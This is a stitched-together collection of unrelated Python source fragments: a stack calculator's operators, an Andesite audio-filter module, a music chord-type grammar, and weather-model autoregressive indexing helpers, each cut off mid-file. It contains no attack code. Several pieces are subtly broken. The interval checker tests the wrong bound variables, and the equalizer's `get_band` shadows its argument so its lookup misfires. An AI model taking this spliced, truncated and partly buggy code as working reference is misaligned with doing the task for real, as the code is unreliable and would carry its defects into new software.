    def get(self, name):
        """Look `name` up, user dictionary first.

        Raises:
            CalculatorError: if the name is defined in neither dictionary.
        """
        try:
            return self._user_dict[name]
        except KeyError:
            try:
                return self._system_dict[name]
            except KeyError:
                raise CalculatorError(f'Unrecognized name "{name}".')

    def put(self, name, value):
        """Define `name` in the user dictionary, shadowing any system name."""
        self._user_dict[name] = value


class _OperandStack:
    """Stack of operand values with calculator-specific error reporting."""

    def __init__(self):
        self.clear()

    def clear(self):
        self._operands = []

    def __len__(self):
        return len(self._operands)

    def push(self, obj):
        self._operands.append(obj)

    def pop(self):
        """Remove and return the top operand.

        Raises:
            CalculatorError: if the stack is empty.
        """
        try:
            return self._operands.pop()
        except IndexError:
            raise CalculatorError('Attempt to pop from empty operand stack.')

    def peek(self, operand_count=1):
        """Return the top `operand_count` operands (bottom-to-top order)
        without removing them.

        Raises:
            CalculatorError: if the stack holds fewer than
                `operand_count` operands.
        """
        if len(self) < operand_count:
            operand_count = _get_operand_count_text(operand_count)
            raise CalculatorError(
                f'Attempt to peek at {operand_count} of operand stack '
                f'that has only {len(self)}.')
        else:
            return self._operands[-operand_count:]


def _get_operand_count_text(operand_count):
    """Return e.g. '1 operand' or '3 operands'."""
    suffix = '' if operand_count == 1 else 's'
    return f'{operand_count} operand{suffix}'


class _Type:
    """Abstract operand type used by operators for type checking."""

    def __init__(self, name):
        self._name = name

    @property
    def name(self):
        return self._name

    def is_instance(self, x):
        raise NotImplementedError()


class _SimpleType(_Type):
    """Type defined by included (and optionally excluded) Python classes.

    The exclusion supports e.g. an integer type that rejects `bool`,
    since `bool` is a subclass of `int` in Python.
    """

    def __init__(self, name, included_class_info, excluded_class_info=()):
        super().__init__(name)
        self._included_class_info = included_class_info
        self._excluded_class_info = excluded_class_info

    def is_instance(self, x):
        return isinstance(x, self._included_class_info) and \
            not isinstance(x, self._excluded_class_info)


class _AnyType(_Type):
    """Type to which every value belongs."""

    def __init__(self):
        super().__init__('any')

    def is_instance(self, _):
        return True


class _UnionType(_Type):
    """Type comprising the union of several member types."""

    def __init__(self, types):
        name = ' | '.join(t.name for t in types)
        super().__init__(name)
        self._types = tuple(types)

    def is_instance(self, x):
        return any(t.is_instance(x) for t in self._types)


# Interpreter value types.
# Concrete interpreter value types, built from the _Type hierarchy above.
_Boolean = _SimpleType('boolean', bool)
_Integer = _SimpleType('integer', int, bool)
_Float = _SimpleType('float', float)
_String = _SimpleType('string', str)
_Number = _UnionType((_Integer, _Float))
_Any = _AnyType()


def _is_instance(x, arg):
    """Return True if `x` belongs to `arg`, a _Type or iterable of _Types."""
    if isinstance(arg, _Type):
        return arg.is_instance(x)
    else:
        return any(_is_instance(x, t) for t in arg)


class _Operator:
    """Abstract calculator operator with declared operand types."""

    def __init__(self, name, operand_types):
        self._name = name
        self._operand_types = operand_types

    @property
    def name(self):
        return self._name

    @property
    def operand_types(self):
        return self._operand_types

    @property
    def operand_count(self):
        return len(self.operand_types)

    def execute(self, calc):
        """Perform this operator's action on calculator `calc`."""
        raise NotImplementedError()

    def _check_operand_count(self, calc):
        """Raise CalculatorError if the stack is too short for this operator."""
        operand_stack = calc.operand_stack
        if self.operand_count > len(operand_stack):
            # not enough operands for this operator
            required_count = _get_operand_count_text(self.operand_count)
            stack_count = _get_operand_count_text(len(operand_stack))
            raise CalculatorError(
                f'Operator "{self.name}" requires {required_count} '
                f'but operand stack contains only {stack_count}.')

    def _get_operands(self, calc):
        """Peek (not pop) this operator's operands, type-checking each one."""
        self._check_operand_count(calc)
        operands = calc.operand_stack.peek(self.operand_count)
        pairs = zip(operands, self.operand_types)
        for i, (operand, required_type) in enumerate(pairs):
            if not _is_instance(operand, required_type):
                value_text = _get_value_text(operand)
                type_name = _get_type_name(required_type)
                raise CalculatorError(
                    f'Operator "{self.name}" operand {i + 1} with value '
                    f'{value_text} is not of required type {type_name}.')
        return operands


def _get_value_text(x):
    """Format a value for error messages, using calculator syntax for booleans."""
    if x is True:
        return 'true'
    elif x is False:
        return 'false'
    elif isinstance(x, str):
        return f'"{x}"'
    else:
        return str(x)


def _get_type_name(arg):
    """Return the display name of a _Type or of a tuple of _Types."""
    if isinstance(arg, _Type):
        return arg.name
    else:
        return ' | '.join(_get_type_name(t) for t in arg)


class _ConstantOperator(_Operator):
    """Operator that pushes a fixed constant (e.g. `true`, `false`)."""

    def __init__(self, name, constant):
        super().__init__(name, ())
        self._constant = constant

    def execute(self, calc):
        calc.operand_stack.push(self._constant)


class _Dup(_Operator):
    """Duplicate the top operand."""

    def __init__(self):
        super().__init__('dup', (_Any,))

    def execute(self, calc):
        operand, = self._get_operands(calc)
        calc.operand_stack.push(operand)


class _Exch(_Operator):
    """Exchange the top two operands."""

    def __init__(self):
        super().__init__('exch', (_Any, _Any))

    def execute(self, calc):
        self._check_operand_count(calc)
        stack = calc.operand_stack
        x = stack.pop()
        y = stack.pop()
        stack.push(x)
        stack.push(y)


class _Pop(_Operator):
    """Discard the top operand."""

    def __init__(self):
        super().__init__('pop', (_Any,))

    def execute(self, calc):
        self._check_operand_count(calc)
        calc.operand_stack.pop()


class _Clear(_Operator):
    """Discard all operands."""

    def __init__(self):
        super().__init__('clear', ())

    def execute(self, calc):
        calc.operand_stack.clear()


class _BinaryOperator(_Operator):
    """Operator that pops two operands and pushes `function(x, y)`."""

    def __init__(self, name, operand_types, function):
        super().__init__(name, operand_types)
        self._function = function

    def execute(self, calc):
        # Get operands. Do not modify stack: the stack should be
        # modified only if the operation succeeds.
        x, y = self._get_operands(calc)
        try:
            # Operate.
            result = self._function(x, y)
        except Exception as e:
            # operation failed
            raise CalculatorError(
                f'Execution of "{self.name}" operator failed with message: '
                f'{str(e)}')
        else:
            # operation succeeded
            # Modify stack.
            stack = calc.operand_stack
            stack.pop()
            stack.pop()
            stack.push(result)


class _BinaryArithmeticOperator(_BinaryOperator):
    """Binary operator restricted to numeric (int/float, non-bool) operands."""

    def __init__(self, name, function):
        operand_types = (_Number, _Number)
        super().__init__(name, operand_types, function)


def _div(x, y):
    """Division with an explicit CalculatorError on a zero divisor."""
    if y == 0:
        raise CalculatorError('divide by zero.')
    else:
        return x / y


def _mod(x, y):
    """Modulo with an explicit CalculatorError on a zero divisor."""
    if y == 0:
        raise CalculatorError('divide by zero.')
    else:
        return x % y


class _UnaryOperator(_Operator):
    """Operator that pops one operand and pushes `function(x)`."""

    def __init__(self, name, operator_types, function):
        super().__init__(name, operator_types)
        self._function = function

    def execute(self, calc):
        # Get operand. Do not modify stack: the stack should be
        # modified only if the operation succeeds.
        x, = self._get_operands(calc)
        try:
            # Operate.
            result = self._function(x)
        except Exception as e:
            # operation failed
            raise CalculatorError(
                f'Execution of "{self.name}" operator failed with message: '
                f'{str(e)}')
        else:
            # operation succeeded
            # Modify stack.
            stack = calc.operand_stack
            stack.pop()
            stack.push(result)


class _UnaryArithmeticOperator(_UnaryOperator):
    """Unary operator restricted to numeric (int/float, non-bool) operands."""

    def __init__(self, name, function):
        operand_types = (_Number,)
        super().__init__(name, operand_types, function)


class _CoercionOperator(_UnaryOperator):
    """Unary operator that converts among integer, float, and string."""

    def __init__(self, name, function):
        operand_types = ((_Integer, _Float, _String),)
        super().__init__(name, operand_types, function)


def _boolean(x):
    """Coerce the literal strings 'true'/'false' to bool; reject anything else."""
    if x == 'true':
        return True
    elif x == 'false':
        return False
    else:
        x = _get_value_text(x)
        raise CalculatorError(f'cannot coerce {x}.')


def _integer(x):
    return _coerce(x, int)


def _coerce(x, type_):
    """Apply `type_` to `x`, translating any failure to CalculatorError."""
    try:
        return type_(x)
    except Exception:
        x = _get_value_text(x)
        raise CalculatorError(f'cannot coerce {x}.')


def _float(x):
    return _coerce(x, float)


class _ComparisonOperator(_BinaryOperator):
    """Binary operator comparing two operands of any type."""

    def __init__(self, name, function):
        operand_types = (_Any, _Any)
        super().__init__(name, operand_types, function)


def _eq(x, y):
    # In most circumstances we delegate to Python's == operator.
    # That operator compares False and True as though they were 0
    # and 1, respectively, however, which we do not want. We deal
    # with this by returning False if one operand is boolean and
    # the other is not.
    is_boolean = _Boolean.is_instance
    if is_boolean(x) == is_boolean(y):
        # either both operands are boolean or both are non-boolean
        return x == y
    else:
        # one operand is boolean and the other is not
        return False


def _ne(x, y):
    return not _eq(x, y)


def _gt(x, y):
    return _compare(x, y, operator.gt)


def _compare(x, y, op):
    # In most circumstances we delegate to Python's comparison operators.
    # Those operators compare False and True as though they were 0 and 1,
    # respectively, however, which we do not want. We deal with this by
    # raising an exception if one operand is boolean and the other is not.
    is_boolean = _Boolean.is_instance
    if is_boolean(x) == is_boolean(y):
        # either both operands are boolean or both are non-boolean
        try:
            return op(x, y)
        except Exception:
            pass
    # If we get here, either one operand is boolean and the other is
    # not or `op` raised an exception.
    x = _get_value_text(x)
    y = _get_value_text(y)
    raise CalculatorError(f'cannot compare {x} and {y}.')


def _ge(x, y):
    return _compare(x, y, operator.ge)


def _lt(x, y):
    return _compare(x, y, operator.lt)


def _le(x, y):
    return _compare(x, y, operator.le)


class _BinaryLogicalOperator(_BinaryOperator):
    """Binary operator restricted to boolean operands."""

    def __init__(self, name, function):
        operand_types = (_Boolean, _Boolean)
        super().__init__(name, operand_types, function)


class _UnaryLogicalOperator(_UnaryOperator):
    """Unary operator restricted to boolean operands."""

    def __init__(self, name, function):
        operand_types = (_Boolean,)
        super().__init__(name, operand_types, function)


# Registry of all built-in operators, presumably used to build _SYSTEM_DICT.
_OPERATORS = (

    # constants
    _ConstantOperator('true', True),
    _ConstantOperator('false', False),

    # stack manipulation
    _Dup(),
    _Exch(),
    _Pop(),
    _Clear(),

    # binary arithmetic
    _BinaryArithmeticOperator('add', operator.add),
    _BinaryArithmeticOperator('sub', operator.sub),
    _BinaryArithmeticOperator('mul', operator.mul),
    _BinaryArithmeticOperator('div', _div),
    _BinaryArithmeticOperator('mod', _mod),
    _BinaryArithmeticOperator('pow', operator.pow),

    # unary arithmetic
    _UnaryArithmeticOperator('neg', operator.neg),
    _UnaryArithmeticOperator('abs', abs),
    _UnaryArithmeticOperator('ceiling', math.ceil),
    _UnaryArithmeticOperator('floor', math.floor),
    _UnaryArithmeticOperator('round', round),
    _UnaryArithmeticOperator('exp', math.exp),
    _UnaryArithmeticOperator('ln', math.log),
    _UnaryArithmeticOperator('log2', math.log2),
    _UnaryArithmeticOperator('log10', math.log10),

    # coercion
    _CoercionOperator('boolean', _boolean),
    _CoercionOperator('integer', _integer),
    _CoercionOperator('float', _float),

    # comparison
    # NOTE(review): this tuple is truncated here — the comparison and
    # logical operator entries (and the closing parenthesis) lie beyond
    # the visible chunk of this file.
<filename>andesite/models/filters.py """Andesite audio filters. Attributes: FILTER_MAP (Mapping[str, Type[Filter]]): Mapping from filter name to filter class. See: `get_filter_model`. FilterMapLike (Union[FilterMap, Dict[str, Union[Filter, RawDataType]]]): (Type alias) Type of objects which can be used as filter maps. This includes the `FilterMap`. """ import abc from dataclasses import dataclass, field from operator import eq from typing import Any, Dict, Iterable, Iterator, List, Mapping, MutableMapping, Optional, Set, Type, TypeVar, Union, \ overload from andesite.transform import RawDataType, build_from_raw, convert_to_raw __all__ = ["Filter", "EqualizerBand", "Equalizer", "Karaoke", "Timescale", "Tremolo", "Vibrato", "VolumeFilter", "get_filter_model", "FilterMap", "FilterMapLike"] def _ensure_in_interval(value: float, *, low: float = None, low_inc: float = None, up: float = None, up_inc: float = None) -> None: """Ensure a value is within an interval. Raises: ValueError: If the provided value isn't within the given constraints. """ low_symbol: Optional[str] = None up_symbol: Optional[str] = None valid: bool = True if low_inc is not None: low_symbol = f"[{low_inc}" if not value >= low: valid = False elif low is not None: low_symbol = f"({low}" if not value > low: valid = False if up_inc is not None: up_symbol = f"{up_inc}]" if not value <= up_inc: valid = False elif up is not None: up_symbol = f"{up})" if value < up_inc: valid = False if not valid: low_symbol = low_symbol or "[-INF" up_symbol = up_symbol or "INF]" raise ValueError(f"Provided value ({value}) not in interval {low_symbol}, {up_symbol}!") class _Filter(abc.ABC): """Filter with name. Attributes: __filter_name__ (str): Name of the filter. This is a magic attribute used by the library to convert the filter into its Andesite representation. """ __filter_name__: str @dataclass class Filter(_Filter, abc.ABC): """Audio filter for Andesite. Attributes: enabled (bool): Whether or not the filter is enabled. 
This value is mostly useful when receiving the filters from Andesite. However you can also set it to `False` when sending filters. This will cause the settings to be ignored and instead the default values are sent to Andesite which will cause the filter to be disabled. When creating a new `Filter` instance its values are set to the default value. """ enabled: bool = True def reset(self) -> None: """Reset the filter settings back to their default values.""" self.__init__() @classmethod def __transform_output__(cls, data: RawDataType) -> RawDataType: enabled = data.pop("enabled") if enabled: return data else: # create a new instance (which uses the defaults) and return its data return convert_to_raw(cls()) @dataclass class EqualizerBand: """ Attributes: band (int): band number to configure ( 0 - 14 ) gain (float): value to set for the band ( [-0.25, 1.0] ) """ band: int gain: float = 0.0 def set_band(self, value: int) -> None: """Setter for :py:attr:`band` which performs a value check. Args: value: Value to set for the band. ( [0, 14] ) Raises: ValueError: if the provided value is invalid. """ _ensure_in_interval(value, low_inc=0, up_inc=14) self.band = value def set_gain(self, value: float) -> None: """Setter for :py:attr:`gain` which performs a value check. Args: value: Value to set for the gain. ( [-0.25, 1] ) Raises: ValueError: if the provided value is invalid. 
""" _ensure_in_interval(value, low_inc=-.25, up_inc=1) self.gain = value @dataclass class Equalizer(Filter): """ Attributes: bands (List[EqualizerBand]): array of bands to configure """ __filter_name__ = "equalizer" bands: List[EqualizerBand] = field(default_factory=list) def __iter__(self) -> Iterator[EqualizerBand]: return iter(self.bands) def __eq__(self, other: Any) -> bool: if isinstance(other, Equalizer): for my_gain, other_gain in zip(self.iter_band_gains(), other.iter_band_gains()): if my_gain != other_gain: return False return True else: return NotImplemented def __hash__(self) -> int: return hash(self.iter_band_gains()) @classmethod def __transform_input__(cls, data: RawDataType) -> None: # Andesite sends the equalizer filter as an array of floats bands = data["bands"] for i, gain in enumerate(bands): bands[i] = EqualizerBand(i, gain) @classmethod def from_gains(cls, gains: Iterable[Optional[float]]) -> "Equalizer": """Create an `Equalizer` filter from a list of gains. Args: gains: Iterable of `float` which correspond to the gain for the band, or `None` if the band doesn't specify a gain. """ bands: List[EqualizerBand] = [] for i, gain in enumerate(gains): if gain is not None: bands.append(EqualizerBand(i, gain)) return cls(True, bands) @overload def get_band(self, band: int) -> EqualizerBand: ... @overload def get_band(self, band: int, create: bool) -> Optional[EqualizerBand]: ... def get_band(self, band: int, create: bool = True) -> Optional[EqualizerBand]: """Get the specified band from the bands list. If the band doesn't exist it is created. If you don't want to automatically create a band, pass `create=False`. Args: band: Band number to get create: Whether or not to create a new band if it doesn't exist. 
(Defaults to True) """ try: return next(band for band in self.bands if band.band == band) except StopIteration: pass if not create: return None band = EqualizerBand(band) self.bands.append(band) return band def get_band_gain(self, band: int) -> Optional[float]: """Get the gain of a band. Returns: Gain of the band or `None` if it doesn't exist. """ band = self.get_band(band, create=False) if band: return band.gain else: return None def set_band_gain(self, band: int, gain: float) -> None: """Set the gain of a band to the specified value. If the band does not exist it is created. Args: band: Band number to set the gain for. gain: Value to set for the gain. ( [-0.25, 1] ) Raises: ValueError: if the provided gain is invalid. """ self.get_band(band).set_gain(gain) @overload def iter_band_gains(self, use_default: bool) -> List[Optional[float]]: ... @overload def iter_band_gains(self) -> List[float]: ... def iter_band_gains(self, use_default: bool = True) -> List[Optional[float]]: """Get a list of all the bands' gains in order. Args: use_default: Whether or not to replace non-existent values with the default gain. If `False` and band doesn't have a gain set, `None` is used instead. 
""" default_value: Union[float, None] = EqualizerBand.gain if use_default else None gains: List[Optional[float]] = 15 * [default_value] for band in self: gain = band.gain if use_default and gain is None: continue gains[band.band] = gain return gains @dataclass class Karaoke(Filter): """ Attributes: level (float) mono_level (float) filter_band (float) filter_width (float) """ __filter_name__ = "karaoke" level: float = 1.0 mono_level: float = 1.0 filter_band: float = 220.0 filter_width: float = 100.0 @dataclass class Timescale(Filter): """ Attributes: speed (float): speed to play music at (> 0) pitch (float): pitch to set (> 0) rate (float): rate to set (> 0) """ __filter_name__ = "timescale" speed: float = 1.0 pitch: float = 1.0 rate: float = 1.0 def set_speed(self, value: float) -> None: """Setter for :py:attr:`speed` which performs a value check. Args: value: Value to set for the speed. ( (0, INF] ) Raises: ValueError: if the provided value is invalid. """ _ensure_in_interval(value, low=0) self.speed = value def set_pitch(self, value: float) -> None: """Setter for :py:attr:`pitch` which performs a value check. Args: value: Value to set for the pitch. ( (0, INF] ) Raises: ValueError: if the provided value is invalid. """ _ensure_in_interval(value, low=0) self.pitch = value def set_rate(self, value: float) -> None: """Setter for :py:attr:`rate` which performs a value check. Args: value: Value to set for the rate. ( (0, INF] ) Raises: ValueError: if the provided value is invalid. """ _ensure_in_interval(value, low=0) self.rate = value @dataclass class Tremolo(Filter): """ Attributes: frequency (float): (> 0) depth (float): ( (0, 1] ) """ __filter_name__ = "tremolo" frequency: float = 2.0 depth: float = 0.5 def set_frequency(self, value: float) -> None: """Setter for :py:attr:`frequency` which performs a value check. Args: value: Value to set for the frequency. ( (0, INF] ) Raises: ValueError: if the provided value is invalid. 
""" _ensure_in_interval(value, low=0) self.frequency = value def set_depth(self, value: float) -> None: """Setter for :py:attr:`depth` which performs a value check. Args: value: Value to set for the depth. ( (0, 1] ) Raises: ValueError: if the provided value is invalid. """ _ensure_in_interval(value, low=0, up_inc=1) self.depth = value @dataclass class Vibrato(Filter): """ Attributes: frequency (float): ( (0, 14] ) depth (float): ( (0, 1] ) """ __filter_name__ = "vibrato" frequency: float = 2.0 depth: float = 0.5 def set_frequency(self, value: float) -> None: """Setter for :py:attr:`frequency` which performs a value check. Args: value: Value to set for the frequency. ( (0, 14] ) Raises: ValueError: if the provided value is invalid. """ _ensure_in_interval(value,
class TertianChordType:
    """
    Enum-like type enumerating every tertian chord variety supported by the
    template grammar: triads, sixth chords, sevenths, suspensions, the
    augmented-sixth chords (Fr/Ger/It) and the Neapolitan (N6).
    """

    # Integer codes assigned in declaration order, 0..28.
    Maj6, Maj, Min6, Min, Dim, Aug, MajSus2, MajSus4, MajSus, Maj7, Maj7Sus4, Maj7Sus2, Maj7Sus, Min7, Dom7, Dom7Sus4,\
        Dom7Sus2, Dom7Sus, Dim7, HalfDim7, MinMaj7, AugMaj7, Aug7, DimMaj7, Dom7Flat5, Fr, Ger, It, N6 = range(29)

    # Names listed in exactly the declaration order above, so index == code.
    # These drive both __str__ and to_type.
    _NAMES = ('Maj6', 'Maj', 'Min6', 'Min', 'Dim', 'Aug', 'MajSus2', 'MajSus4', 'MajSus', 'Maj7', 'Maj7Sus4',
              'Maj7Sus2', 'Maj7Sus', 'Min7', 'Dom7', 'Dom7Sus4', 'Dom7Sus2', 'Dom7Sus', 'Dim7', 'HalfDim7',
              'MinMaj7', 'AugMaj7', 'Aug7', 'DimMaj7', 'Dom7Flat5', 'Fr', 'Ger', 'It', 'N6')
    _NAME_BY_VALUE = {code: name for code, name in enumerate(_NAMES)}
    _VALUE_BY_NAME = {name: code for code, name in enumerate(_NAMES)}

    def __init__(self, ctype):
        # ctype is one of the integer codes declared above.
        self.value = ctype

    def __str__(self):
        # Name for the stored code; None when the code is unrecognized
        # (mirrors the fall-through of an exhaustive if-chain).
        return TertianChordType._NAME_BY_VALUE.get(self.value)

    @staticmethod
    def to_type(t_string):
        """Map a chord-type name (e.g. 'HalfDim7') to a TertianChordType, or None if unknown."""
        code = TertianChordType._VALUE_BY_NAME.get(t_string)
        return TertianChordType(code) if code is not None else None

    def __eq__(self, y):
        # Equality is by underlying integer code.
        return self.value == y.value

    def __hash__(self):
        # Hash on the printable name; note __str__() may be None, which is
        # itself hashable, so this never raises for unknown codes.
        return self.__str__().__hash__()
Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Major)], TertianChordType.Maj7Sus2: [Interval(1, IntervalType.Perfect), Interval(2, IntervalType.Major), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Major)], TertianChordType.Maj7Sus4: [Interval(1, IntervalType.Perfect), Interval(4, IntervalType.Perfect), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Major)], TertianChordType.Maj7Sus: [Interval(1, IntervalType.Perfect), Interval(4, IntervalType.Perfect), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Major)], TertianChordType.Min7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Minor)], TertianChordType.Dom7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Major), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Minor)], TertianChordType.Dom7Sus2: [Interval(1, IntervalType.Perfect), Interval(2, IntervalType.Major), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Minor)], TertianChordType.Dom7Sus4: [Interval(1, IntervalType.Perfect), Interval(4, IntervalType.Perfect), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Minor)], TertianChordType.Dom7Sus: [Interval(1, IntervalType.Perfect), Interval(4, IntervalType.Perfect), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Minor)], TertianChordType.Dim7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(5, IntervalType.Diminished), Interval(7, IntervalType.Diminished)], TertianChordType.HalfDim7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(5, IntervalType.Diminished), Interval(7, IntervalType.Minor)], TertianChordType.MinMaj7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Major)], TertianChordType.AugMaj7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Major), Interval(5, 
IntervalType.Augmented), Interval(7, IntervalType.Major)], TertianChordType.Aug7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Major), Interval(5, IntervalType.Augmented), Interval(7, IntervalType.Minor)], TertianChordType.DimMaj7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(5, IntervalType.Diminished), Interval(7, IntervalType.Major)], TertianChordType.Dom7Flat5: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Major), Interval(5, IntervalType.Diminished), Interval(7, IntervalType.Minor)], TertianChordType.Maj6: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Major), Interval(5, IntervalType.Perfect), Interval(6, IntervalType.Major)], TertianChordType.Min6: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(5, IntervalType.Perfect), Interval(6, IntervalType.Major)], TertianChordType.Fr: [Interval(6, IntervalType.Augmented), Interval(1, IntervalType.Perfect), Interval(2, IntervalType.Major), Interval(4, IntervalType.Augmented)], TertianChordType.Ger: [Interval(6, IntervalType.Augmented), Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(4, IntervalType.Augmented)], TertianChordType.It: [Interval(6, IntervalType.Augmented), Interval(1, IntervalType.Perfect), Interval(4, IntervalType.Augmented)], TertianChordType.N6: [Interval(6, IntervalType.Minor), Interval(2, IntervalType.Minor), Interval(4, IntervalType.Perfect)], } # Note that augmented 6th chords and the neopolitan have the sixth as the root. This is the normal position. # And inversions specified alter that order. So, root position would be inversion == 2. GROUP_BASIS = 'Basis' GROUP_BASIS_TAG = '?P<' + GROUP_BASIS + '>' P1_BASIS = '(' + GROUP_BASIS_TAG + 'T|t)?' 
SCALE_DEGREE = 'III|II|IV|VII|VI|V|I|iii|ii|iv|vii|vi|v|i' GROUP_SCALE_DEGREE = 'ScaleDegree' GROUP_SCALE_DEGREE_TAG = '?P<' + GROUP_SCALE_DEGREE + '>' GROUP_DIATONIC_TONE = 'DiatonicTone' GROUP_DIATONIC_TONE_NAME = '?P<' + GROUP_DIATONIC_TONE + '>' ROOT = '((' + GROUP_DIATONIC_TONE_NAME + DiatonicTone.DIATONIC_PATTERN_STRING + ')|' + \ '(' + GROUP_SCALE_DEGREE_TAG + SCALE_DEGREE + '))' TENSION_RANGE = '(10|11|12|13|14|15|9|8|7|6|5|4|3|2|1)' TENSION = '((\+)' + '(bb|b|##|#)?' + TENSION_RANGE + ')' GROUP_TENSIONS = 'Tensions' GROUP_TENSIONS_TAG = '?P<' + GROUP_TENSIONS + '>' TERTIAN_TENSIONS = '(' + GROUP_TENSIONS_TAG + TENSION + '*)' CHORD_NAMES = 'Maj7Sus4|Maj7Sus2|Maj7Sus|Maj7|MajSus4|MajSus2|MajSus|Maj6|Maj|Min7|MinMaj7|Min6|Min|DimMaj7|' \ 'Dom7Flat5|Dim7|Dim|AugMaj7|Aug7|Aug|Dom7Sus4|Dom7Sus2|Dom7Sus|Dom7|HalfDim7|Fr|Ger|It|N6' GROUP_CHORD = 'Chord' GROUP_CHORD_TAG = '?P<' + GROUP_CHORD + '>' CHORDS = '(' + GROUP_CHORD_TAG + CHORD_NAMES + ')?' INVERSION = '[1-7]' GROUP_INVERSION = 'Inversion' GROUP_INVERSION_TAG = '?P<' + GROUP_INVERSION + '>' # INVERSIONS = '(\@(' + GROUP_INVERSION_TAG + INVERSION + '))?' INVERSION_TENSION = 'InvTension' INVERSION_TENSION_TAG = '?P<' + INVERSION_TENSION + '>' INVERSION_TENSION_STRUCT = '\(' + '(bb|b|##|#)?' + TENSION_RANGE + '\)' INVERSION_TENSION_PATTERN = '(' + INVERSION_TENSION_TAG + INVERSION_TENSION_STRUCT + ')' INVERSIONS = '(\@(' + GROUP_INVERSION_TAG + INVERSION + '|' + INVERSION_TENSION_PATTERN + '))?' # full parse string and accompanying pattern for the tertian chord grammar. TERTIAN_PARSE_STRING = P1_BASIS + ROOT + CHORDS + TERTIAN_TENSIONS + INVERSIONS + '$' TERTIAN_PATTERN = re.compile(TERTIAN_PARSE_STRING) TENSION_PATTERN = re.compile(TENSION) INVERSE_TENSION_PATTERN = re.compile(INVERSION_TENSION_STRUCT) def __init__(self, diatonic_basis, scale_degree, chord_type, tension_intervals, inversion, inversion_interval=None): """ Constructor Args: diatonic_basis: DiatonicTone used as root of chord, e.g. 
C major chord, the C part scale_degree: int version of roman numeral chord_type: The chord type ala TertianChordType tension_intervals: list of Interval's comprising the tensions inversion: int for which of the chord tones (ordinal) serves as root [origin 1] inversion_interval: if specified, indicates which interval should be the base. (both this in interval cannot be non-null.) """ ChordTemplate.__init__(self) self.__diatonic_basis = diatonic_basis # DiatonicTone self.__scale_degree = scale_degree self.__chord_type = chord_type self.__tension_intervals = tension_intervals # list of [number, augmentation] representing intervals self.__inversion = inversion # which tone of n is the bass self.__inversion_interval = inversion_interval self.__base_intervals = [] if chord_type: self.__base_intervals.extend(TertianChordTemplate.TERTIAN_CHORD_TYPE_MAP[self.chord_type.value]) # Remove duplicate tensions seen = set() seen_add = seen.add deduped_tension_intervals = [tension for tension in self.tension_intervals if not (tension.semitones() in seen or seen_add(tension.semitones()))] self.__tension_intervals = deduped_tension_intervals # Inversion check - only if chord type was given, not for cases like II if self.chord_type and (self.inversion
<reponame>deepsphere/deepsphere-weather<filename>modules/utils_autoregressive.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Fri Jan 15 17:00:54 2021 @author: ghiggi """ import numpy as np import matplotlib.pyplot as plt #-----------------------------------------------------------------------------. ###################### ### Miscellaneous #### ###################### def is_sorted_array(arr, increasing=True): """Check the array is sorted.""" # If only 1 if len(arr) == 0: return True # If multiple values if increasing: return np.all(np.diff(arr) >= 0) else: return np.all(np.diff(arr) <= 0) def is_number(x): """Check is a number.""" if isinstance(x, (int, float)): return True else: return False def is_natural_number(x): """Check is a natural number.""" if not is_number(x): return False else: if isinstance(x, int): return True elif isinstance(x, float): return x.is_integer() else: raise ValueError("Error. Not covered all number types") #-----------------------------------------------------------------------------. ############################### ### First and last indices #### ############################### def get_first_valid_idx(input_k): """Provide the first available index for training, once accounted the past timesteps required.""" past_idxs = input_k[input_k < 0] if past_idxs.size == 0: # empty past_idxs = 0 else: past_idxs = abs(min(past_idxs)) return past_idxs def get_last_valid_idx(output_k, forecast_cycle, ar_iterations): """Provide the last available index for training, once accounted for all forecasted timesteps.""" future_idxs = output_k[output_k >= 0] if future_idxs.size == 0: # empty future_idxs = 0 else: future_idxs = abs(max(future_idxs)) return ar_iterations*forecast_cycle + future_idxs #-----------------------------------------------------------------------------. 
############################################## ### Indexing dictionaries for AR training #### ############################################## # - X and Y dictionary are relative to idx_start=0 def get_idx_lag(idx_start, ar_iteration, forecast_cycle, input_k): """Provide the indices of past predictors.""" return idx_start + (forecast_cycle*ar_iteration) + input_k def get_idx_forecast(idx_start, ar_iteration, forecast_cycle, output_k): """Provide the indices of the forecasts.""" return idx_start + (forecast_cycle*ar_iteration) + output_k def get_dict_Y(ar_iterations, forecast_cycle, output_k): """Provide information to load the labels required by an AR model.""" dict_Y = {} for i in range(ar_iterations+1): dict_Y[i] = get_idx_forecast(idx_start=0, ar_iteration=i, forecast_cycle=forecast_cycle, output_k=output_k) return dict_Y def get_dict_X_dynamic(ar_iterations, forecast_cycle, input_k): """Provide information to load the dynamic data required by an AR model.""" dict_X_past = {} for i in range(ar_iterations+1): idxs = get_idx_lag(idx_start=0, ar_iteration=i, forecast_cycle=forecast_cycle, input_k=input_k) idxs_past_data = idxs[idxs < 0] # Indexes of past data if (idxs_past_data.size == 0): dict_X_past[i] = None else: dict_X_past[i] = idxs_past_data return dict_X_past def get_dict_X_bc(ar_iterations, forecast_cycle, input_k): """Provide information to load the boundary conditions data required by an AR model.""" dict_X_bc = {} for i in range(ar_iterations+1): dict_X_bc[i] = get_idx_lag(idx_start=0, ar_iteration=i, forecast_cycle=forecast_cycle, input_k=input_k) return dict_X_bc def get_dict_stack_info(ar_iterations, forecast_cycle, input_k, output_k, stack_most_recent_prediction = True): """Provide the information required to stack the iterative predictions of an AR model.""" 